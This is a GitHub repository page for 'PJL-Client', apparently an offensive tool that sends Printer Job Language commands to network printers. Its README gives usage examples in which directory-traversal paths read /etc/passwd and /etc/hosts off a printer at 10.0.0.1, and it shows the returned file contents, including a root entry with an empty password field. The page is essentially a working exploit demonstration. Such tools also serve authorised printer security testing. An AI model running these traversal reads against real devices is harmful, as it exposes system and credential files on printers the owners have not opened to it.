Skip to content

hacktivesec/PJL-Client

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 

Repository files navigation

PJL-Client

Usage: python pjlclient.py <dir|read> <path/file>

Examples:

$python pjlclient.py 10.0.0.1 dir 0:/pcl/macros
$python pjlclient.py 10.0.0.1 read 0:/pcl/macros/file.pcl
$python pjlclient.py 10.0.0.1 read 0:\..\..\..\etc\passwd

@PJL FSUPLOAD FORMAT:BINARY NAME="0:......\etc\passwd" OFFSET=0 SIZE=23
root::0:0::/:/bin/dlsh

$python pjlclient.py 10.0.0.1 read 0:\..\..\..\etc\hosts

@PJL FSUPLOAD FORMAT:BINARY NAME="0:......\etc\hosts" OFFSET=0 SIZE=362
127.0.0.1 localhost mailhost loghost

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages